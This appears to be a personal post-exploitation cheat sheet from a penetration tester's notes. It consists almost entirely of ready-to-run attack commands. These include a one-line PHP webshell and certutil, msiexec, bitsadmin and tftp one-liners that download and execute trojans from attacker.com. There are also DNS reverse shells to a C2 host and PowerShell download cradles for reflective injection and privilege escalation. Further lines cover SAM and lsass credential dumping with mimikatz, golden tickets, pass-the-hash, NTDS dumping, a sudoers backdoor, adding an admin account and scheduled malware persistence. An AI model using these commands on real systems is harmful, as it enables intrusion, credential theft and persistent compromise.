- #https://raw.githubusercontent.com/w4fz5uck5/Pentest-notes/master/POST_exploitation.txt
- CYTHON:
- sudo pip install cython
- mv test.py test.pyx
- cython test.pyx --embed
- <python 3>
- gcc -Os -I /usr/include/python3.5m -o test test.c -lpython3.5m -lpthread -lm -lutil -ldl
- <python 2>
- gcc -Os -I /usr/include/python2.7 -o test test.c -lpython2.7 -lpthread -lm -lutil -ldl
- LIKE A BOSS PHP WEBSHELL:
- <?=($_=@$_GET[0]).@$_($_GET[1]);
- |
- -> 127.0.0.1?0=system&1=ls -la
- DOWNLOAD/EXECUTE FILES WITHOUT POWERSHELL:
- # attacker machine: python -m SimpleHTTPServer 80
- certutil -urlcache -split -f attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.104 lport=31337 -f msi > trojan.msi
- # attacker machine: python -m SimpleHTTPServer 80
- msiexec /q /i http://attacker.com/trojan.msi
- # attacker machine: atftpd --daemon --port 69 /tmp
- tftp -i attacker.com GET trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: python -m SimpleHTTPServer 80
- bitsadmin /transfer n http://attacker.com/trojan.exe %TEMP%\trojan.exe && %TEMP%\trojan.exe
- # attacker machine: twistd -n ftp -p 21
- ftp 127.0.0.1 username password get file exit
- ANTIVIRUS:
- sc query Windefend #Check for windows defender
- SHOW HOTFIXES:
- wmic qfe get Caption,Description,HotFixID,Installedon
- DNS reverse shell
- |-----------------Dnscat2 powershell METHOD-------------
- '-> https://github.com/iagox86/dnscat2
- |-> ruby dnscat2 dummyc2.net -e open --no-cache # Start dnscat2 server on your c2dummy machine
- | |
- | '-> https://github.com/lukebaggett/dnscat2-powershell # Connect to the server using powershell script
- | '-> Start-Dnscat2 -Domain dummyc2.net -DNSServer <c2IP> -NoEncryption
- |
- |--------------------powercat METHOD--------------------
- '-> https://github.com/iagox86/dnscat2/archive/v0.01.zip
- '-> dnscat2 version 1 (works better):
- |
- -> ruby dnscat2 dummyc2.net # Start dnscat2 server on your c2dummy machine
- | |
- | '-> https://github.com/besimorhino/powercat
- | '-> powercat -c <c2ip> -dns dummyc2.net -p 53 -rep -v -ep -dnsft 20 # Connecting to server using powercat script
- |
- |--------------------iagox86 METHOD--------------------
- '-> https://downloads.skullsecurity.org/dnscat2/
- '-> https://github.com/iagox86/dnscat2
- |
- '-> PS C:\Users\bob\Desktop>
- '-> $PEBytes = [Convert]::FromBase64String((new-object net.webclient).DownloadString("http://c2.net:8000/dnscat.txt"));
- |
- '-> IEX(new-object net.webclient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1");
- |
- '-> Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "--dns domain=c2.net,server=8.8.8.8"
- PASS-THE-HASH:
- Metasploit:
- use exploit/windows/smb/psexec
- pth-smbclient --user=<USER> --pw-nt-hash -m smb3 -L <TARGET_IP> \\\\<TARGET_IP>\\ <SMB HASH>
- pth-winexe -U <DOMAIN>/<USER>%<PASSWORD> --system //<TARGET_IP> cmd.exe
- pth-winexe -U <DOMAIN>/<USER>%00000000000000000000000000000000:<PASSWORD> --system //<TARGET_IP> cmd.exe # hash is given as LM:NT; the LM half can be all zeros, only the NT hash is needed
- |
- -> https://github.com/byt3bl33d3r/pth-toolkit.git
- DOCKER:
- docker run -v /:/host -t -i bash #privilege escalation: https://fosterelli.co/privilege-escalation-via-docker.html
- Nice and reliable payloads:
- windows/meterpreter_reverse_https
- CREDENTIALS:
- .--
- | From non-auth user to local admin in 3 steps (still too common). Null session:
- | net use \\dc\ipc$ "" /u:""
- |
- | Search for cpasswords in gpo's:
- | dir \\dc\sysvol\contoso.corp\Policies -r -I *.xml | Select-String cPassword >> dump.txt
- |
- | Decrypt the cPassword:
- | gpp-decrypt <string>
- \_
- PWDUMP:
- reg save hklm\sam c:\sam
- reg save hklm\system c:\system
- pwdump system sam
- Mimikatz:
- LSASS.DUMP:
- C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
- mimikatz # sekurlsa::minidump lsass.dmp
- mimikatz # sekurlsa::logonPasswords
- <....>
- GOLDEN TICKET:
- http://rycon.hu/papers/goldenticket.html
- https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/
- https://resources.infosecinstitute.com/pass-hash-pass-ticket-no-pain/#gref
- cmds:
- kerberos::golden /user:utilisateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /id:1107 /groups:513 /ticket:utilisateur.chocolate.kirbi
- sekurlsa::tickets /export
- kerberos::ptt <out-*krbtgt*.kirbi> # Located on mimikatz current work folder
- BYPASSING AV:
- https://github.com/klsecservices/bat-armor/blob/master/examples/krbtgt.bat
- MIMIKATZ PARSER: #https://gist.github.com/Raikia/66ba8279971d16770e94
- Mimikatz 1.0:
- cat mimikatz_dump.txt | grep -P '((Utilisateur principal)|(msv1_0)|(kerberos)|(ssp)|(wdigest)|(tspkg))\s+:\s+.+' | grep -v 'n\.' | sed -e 's/^\s\+[^:]*:\s\+//' | sed -e 's/Utilisateur principal\s\+:\s\+\(.*\)$/\n\1/' | sort -u
- Mimikatz 2.0 (unfortunately, you must "apt-get install pcregrep" because reasons):
- cat mimikatz_dump.txt | pcregrep -M 'Username\s+:\s+[^\s]+\n.*Domain\s+:\s+[^\s]+\n.*Password\s+:\s+[^\s]+\n' | sed "s/'/\\\'/" | xargs -L 3 echo | grep -v '\(null\)' | sed -e 's/* Username : //g;s/* Domain ://g;s/* Password ://g' | awk '{print $2 "\\" $1 ":" $3}' | sort -u
- Domain Controller:
- nltest /dclist:domain.corp #resolve domain DCs names
- crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -p <password> #dump all ntds credentials using clean text password
- crackmapexec -t 20 smb --ntds <IP> -d <domain> -u <username> -H <NTLM> #dump all ntds credentials using hash
- crackmapexec -t 20 smb <IPS.TXT>(or ip/24) -d <domain> -u <username> -H <NTLM> #bruteforce hosts using leaked administrators credentials
- qwinsta # show logged users
- quser
- net groups /domain
- net groups "Domain Admins" /domain
- Exchange Trusted Subsystem // Exchange Windows Permissions:
- https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
- VNCINJECT:
- use exploit/windows/local/payload_inject
- |
- -> set payload windows/vncinject/reverse_tcp
- TCPDump:
- Can the target machine reach you?
- |
- -> tcpdump -i <interface> src host <target_ip>
- Can you reach the target machine?
- |
- -> tcpdump -i <interface> dst host <target_ip>
- |
- -> Try pinging to find out whether the target machine has any connectivity to your machine.
- Windows:
- WMIC:
- wmic logicaldisk get caption,description,drivetype,providername,volumename # show windows logical disks
- wmic diskdrive list brief /format:list # show windows disks drivers
- Windows Nmap like:
- setspn -Q */* # list every registered SPN in the domain: a service inventory without scanning
- certutil.exe:
- certutil -urlcache -split -f <WEBSITE>/backdoor.vbs C:\Windows\System32\backdoor.vbs && cscript .\backdoor.vbs
- cmd.exe /C certutil.exe -urlcache -split -f "https://pastebin.com/raw/2agkDJKs" %TEMP%\p.txt && certutil.exe -f -decode %TEMP%\p.txt %TEMP%\p.exe #download procdump.exe
- bitsadmin:
- bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip
- POWERSHELL:
- Execute commands of another user:
- shellpop --number 9 --reverse --host <IP> --port <PORT>
- put the output in a file called "attack.txt", then:
- $user = "dummy"
- $password = "dummy" | ConvertTo-SecureString -AsPlainText -Force
- $creds = new-object system.management.automation.pscredential($user,$password)
- Start-Process -FilePath powershell.exe -WorkingDirectory "C:\Windows\System32\WindowsPowershell\v1.0\" -Credential $creds -ArgumentList("-nop -ep bypass IEX(new-object System.Net.WebClient).DownloadString('http://10.0.2.15:5252/attack.txt')")
- Powershell -nop -ep bypass -c "$file = Get-Content %TEMP%\b64.txt; Select-Object -Last 666 $file; $file"
- powershell -nop -ep bypass -c "IEX(new-object system.net.WebClient).DownloadString('https://pastebin.com/raw/yUjG8y4Q'); Invoke-MS16-032"
- powershell -nop -ep bypass -File .\scan.ps1 -StartIPv4Address 192.168.1.0 -EndIPv4Address 192.168.1.0/24 -Force
- CACLS Windows permissions:
- Common:
- icacls <PATH> /grant "<USER>":(OI)(CI)M
- Add Read-Only permission to a single file
- CACLS myfile.txt /E /G "Power Users":R
- Add Full Control permission to a second group of users
- CACLS myfile.txt /E /G "FinanceUsers":F
- Now revoke the Read permissions from the first group
- CACLS myfile.txt /E /R "Power Users"
- Now give the first group Full-control:
- CACLS myfile.txt /E /G "Power Users":F
- Give the Finance group Full Control of a folder and all sub folders
- CACLS c:\docs\work /E /T /C /G "FinanceUsers":F
- SCHTASKS:
- schtasks /query /fo LIST /v #query all tasks
- schtasks /query /tn malware_task /V #query single task
- schtasks /create /sc minute /mo 1 /tn "malware_task" /tr "C:\Users\w4fz5uck5\Desktop\work\malware.exe" #each 1 min, the malware is executed
- DPKG LIST:
- dpkg-query -l
- Ports checkup:
- netstat -plunt
- sockstat -l #freebsd
- Ping port scanner:
- for i in $(seq 1 65535); do timeout 0.1 /bin/bash -c "echo &>/dev/tcp/<IP>/$i && echo '$i is open'" 2>/dev/null; done
- Mysql commands:
- mysql -u root --password=toor -e "use users; show tables;"
- mysql -u root --password=toor -e "\!/bin/bash"
- Privesc Linux:
- sudo -l
- find / -perm -2 ! -type l -ls 2>/dev/null
- find / -writable -user <USER> 2>/dev/null
- find / -perm -4000 2>/dev/null
- find / -name <FILE_NAME>
- cat /etc/crontab
- ls -lRa /var/www/html/
- procmon.sh
- rpm -aq
- dirtycow.c
- echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/updat
- Privesc Windows:
- https://pentestlab.blog/tag/local-exploits/
- rottenpotato.exe
- ms16-032
- taihou32.exe #CVE-2015-1701
- taihou64.exe
- Tater
- post/multi/recon/local_exploit_suggester
- net users w4fz5uck5 h4x00r /add && net localgroup administrators w4fz5uck5 /add
- Web directories:
- /var/www/html #linux
- C:\inetpub\wwwroot #windows
- Portfwd:
- proxytunnel -p 10.0.1.114:3128 -d 127.0.0.1:22 -a 4444 #Used to portfwd in squid proxies.
- socat TCP-LISTEN:<PORT>,reuseaddr,fork TCP:<REMOTE_IP>:<REMOTE_PORT> # fork so each incoming connection gets its own relay
- /etc/rinetd.conf #Create a proxy for tunneling
- ssh:
- Own all ports:
- sshuttle -r <REMOTE_IP> 0/0 # route all traffic through the ssh host
- local_tunnel:
- ssh <USER>@127.0.0.1 -L 5500:localhost:5500 # Local forward: connections to port 5500 on my machine are sent to port 5500 on the host I connect to.
- remote_tunnel:
- ssh <USER>@127.0.0.1 -R 127.0.0.1:5500:localhost:5500 # Remote forward: connections to port 5500 on the host I connect to are sent back to port 5500 on my machine.
- nmap_through_ssh:
- ssh -D 1080 user@host # SOCKS proxy listening on local port 1080
- nmap -sT -Pn --proxies socks4://127.0.0.1:1080 1.2.3.4 # a SOCKS proxy only carries full TCP connections, so use a connect scan (-sT), not a SYN scan (-sS)
- PLINK (need ansicon to run without ANSI bugs):
- ansicon.exe plink.exe -ssh test@192.168.0.108 #https://github.com/adoxa/ansicon/releases/download/v1.84/ansi184-bin.zip
- Metasploit-Meterpreter:
- portfwd add -l 3389 -p 3389 -r <TARGET_HOST>
- Oracle DB:
- metasploit-framework:
- auxiliary/admin/oracle/sid_brute
- auxiliary/admin/oracle/tnscmd
- auxiliary/admin/oracle/oracle_login
- auxiliary/scanner/oracle/sid_brute
- auxiliary/scanner/oracle/sid_enum
- auxiliary/scanner/oracle/tnslsnr_version
- odat:
- Useful commands:
- get,put,remove:
- python odat.py utlfile 10.10.10.82 -U SCOTT -P tiger -d XE --sysdba --help
- put:
- python odat.py dbmsxslprocessor -s <ip> -U SCOTT -P tiger -d XE --sysdba --putFile 'C:\inetpub\wwwroot\' 'test.txt' 'test.txt'
- read:
- python odat.py ctxsys -s <ip> -U SCOTT -P tiger -d XE --sysdba --getFile 'C:\inetpub\wwwroot\test.txt'
- /*Features
- Thanks to ODAT, you can:
- search valid SID on a remote Oracle Database listener via:
- a dictionary attack
- a brute force attack
- ALIAS of the listener
- search Oracle accounts using:
- a dictionary attack
- each Oracle user's name as its own password (you need an account before using this attack)
- execute system commands on the database server using:
- dbmsscheduler
- java
- externaltables
- oradbg
- download files stored on the database server using:
- utlfile
- external tables
- CTXSYS
- upload files on the database server using:
- utlfile
- dbmsxslprocessor
- dbmsadvisor
- delete files using:
- utlfile
- send/receive HTTP requests from the database server using:
- utlhttp
- HttpUriType
- scan ports of the local server or a remote server using:
- utlhttp
- HttpUriType
- utltcp
- exploit CVE-2012-3137 (http://cvedetails.com/cve/2012-3137)
- pick up the session key and salt for arbitrary users
- dictionary attack on captured sessions*/
- #https://www.kitploit.com/2014/07/odat-oracle-database-attacking-tool.html
- # SPEEDING UP proxying
- # https://www.hackwhackandsmack.com/?p=1021
- proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap_old --append-output <IP Address>
- Bringing xargs into the loop with a thread count of 50 dramatically improves the results; the run took only 9 seconds to complete. An example of this usage is shown below:
- seq 1 1000 | xargs -P 50 -I{} proxychains nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output <IP Address>
- If you want to run multiple ports or port ranges against multiple hosts you could use the following alternative:
- seq 1 254 | xargs -P 50 -I{} proxychains nmap -p 80,443,3389,445,22 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output 192.168.1.{}
- #TODO